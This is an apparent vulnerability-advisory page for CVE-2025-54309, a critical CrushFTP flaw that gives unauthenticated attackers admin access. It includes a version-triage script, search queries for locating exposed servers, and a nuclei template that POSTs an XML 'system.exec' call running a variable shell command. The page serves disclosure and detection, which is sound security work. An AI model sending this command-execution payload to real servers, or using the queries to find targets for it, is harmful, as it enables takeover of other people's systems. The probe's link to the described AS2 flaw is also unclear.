CrushFTP - Unprotected Alternate Channel

Vulnerability Information

Vulnerability name: CrushFTP - Unprotected Alternate Channel

Vulnerability ID:

  • CVE: CVE-2025-54309

Vulnerability type: Unauthorized access

Severity: Critical

Description: CrushFTP is a popular file transfer server widely used in enterprise environments. It supports multiple transfer protocols, including FTP, SFTP, HTTP and HTTPS, and provides a web-based management interface that lets users administer the file transfer service remotely. It is widely deployed in enterprise services and favoured for its rich feature set and ease of use.

The vulnerability is an unauthorized-access flaw. Its technical root cause is that CrushFTP mishandles AS2 validation when the DMZ proxy feature is not in use, which allows a remote attacker to obtain administrator access over HTTPS. Exploitation requires no authentication: an attacker can launch the attack directly over the network and gain full control of the server.

The security impact is extremely severe. An attacker can remotely obtain administrator privileges and thereby take complete control of the CrushFTP server, meaning they can read, modify or delete any file on it and even use the server as a pivot to attack the internal network. Because exploitation requires no user interaction and exploit code has already been observed in use in the wild, this vulnerability poses a serious threat to every affected CrushFTP version. Users are advised to upgrade immediately to 10.8.5, 11.3.4_23 or later to fix this vulnerability.

Vendor: crushftp

Product: CrushFTP

Affected versions: 10 before 10.8.5 and 11 before 11.3.4_23
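The affected range above is per major branch and the fix builds carry an underscore suffix ("11.3.4_23"), so a naive string comparison misclassifies versions such as "11.3.4_9". The following is an added inventory-triage example, not part of the original page or of the nuclei template; the hostnames and the inventory rows are constructed, and the DMZ-proxy handling follows the advisory's own scoping.

```python
import re

# Fixed builds per major branch, from the advisory text on this page:
# 10.x is fixed in 10.8.5, 11.x in 11.3.4_23. Tuples are (major, minor, patch, build).
FIXED_BUILDS = {10: (10, 8, 5, 0), 11: (11, 3, 4, 23)}
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:_(\d+))?$")

def parse_version(version: str) -> tuple:
    """Parse a CrushFTP version such as '11.3.4_23' into a comparable integer tuple.

    The optional '_N' suffix is the build number; a bare '11.3.4' counts as build 0,
    so it sorts below '11.3.4_23'. Plain string comparison gets this wrong
    ('11.3.4_9' > '11.3.4_23' lexically), hence the integer tuple.
    """
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised CrushFTP version string: {version!r}")
    major, minor, patch, build = m.groups()
    return (int(major), int(minor), int(patch), int(build or 0))

def is_affected(version: str, dmz_proxy_in_use: bool = False) -> bool:
    """True if the install falls in the vulnerable range for CVE-2025-54309.

    The advisory scopes the flaw to deployments that do not use the DMZ proxy
    feature, so an instance behind the DMZ proxy is reported as out of scope
    even when its version is below the fixed build; patching it is still advisable.
    """
    if dmz_proxy_in_use:
        return False
    v = parse_version(version)
    fixed = FIXED_BUILDS.get(v[0])
    if fixed is None:
        return False  # only the 10.x and 11.x branches are listed as affected
    return v < fixed

def triage(inventory: list) -> list:
    """Return hosts from (host, version, dmz_proxy_in_use) rows that still need the fix."""
    return [host for host, ver, dmz in inventory if is_affected(ver, dmz)]

if __name__ == "__main__":
    # Constructed sample inventory; hostnames are placeholders, not real systems.
    sample = [
        ("ftp-a.example.internal", "11.3.4_22", False),
        ("ftp-b.example.internal", "11.3.4_23", False),
        ("ftp-c.example.internal", "10.8.4", True),
        ("ftp-d.example.internal", "10.8.4", False),
    ]
    print(triage(sample))  # ['ftp-a.example.internal', 'ftp-d.example.internal']
```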

Search queries: http.html:"crushftp" title:"CrushFTP - Login" title:"CrushFTP WebInterface" http.favicon.hash:-675750811 http.favicon.hash:-1022206565 http.favicon.hash:838835539 "Server: CrushFTP HTTP Server"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/7ab25befca79462095b413c7e83c4d7ea6cfdc77/CVE-2025-54309.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details

id: CVE-2025-54309

info:
  name: CrushFTP - Unprotected Alternate Channel
  author: ANshu Bind
  severity: critical
  description: |
    CrushFTP 10 before 10.8.5 and 11 before 11.3.4_23, when the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS, as exploited in the wild in July 2025.
  impact: |
    Remote attackers can gain administrative access, leading to full control over the CrushFTP server.
  remediation: |
    Update to version 10.8.5, 11.3.4_23 or later.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9
    cve-id: CVE-2025-54309
    cwe-id: CWE-420
    epss-score: 0.07464
    epss-percentile: 0.91328
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    vendor: crushftp
    product: crushftp
    shodan-query:
      - http.html:"crushftp"
      - title:"CrushFTP - Login"
      - title:"CrushFTP WebInterface"
      - http.favicon.hash:-675750811
      - http.favicon.hash:-1022206565
      - http.favicon.hash:838835539
      - "Server: CrushFTP HTTP Server"
    fofa-query:
      - body="crushftp"
      - title="CrushFTP - Login"
      - title="CrushFTP WebInterface"
      - icon_hash="-675750811"
      - icon_hash="-1022206565"
      - icon_hash="838835539"
      - "Server: CrushFTP HTTP Server"
  reference:
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54309
    - https://github.com/advisories/GHSA-rh5q-v9ww-rqgm
    - https://github.com/issamjr/CVE-2025-54309-EXPLOIT
  tags: cve,cve2025,crushftp,rce,unauthenticated

variables:
  cmd: "id"

http:
  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/"

    headers:
      Content-Type: application/xml

    body: |
      <?xml version="1.0"?>
      <methodCall>
        <methodName>system.exec</methodName>
        <params>
          <param>
            <value>
              <string>{{cmd}}</string>
            </value>
          </param>
        </params>
      </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
      - type: status
        status:
          - 200


Author: lianccc
Published: 27 July 2025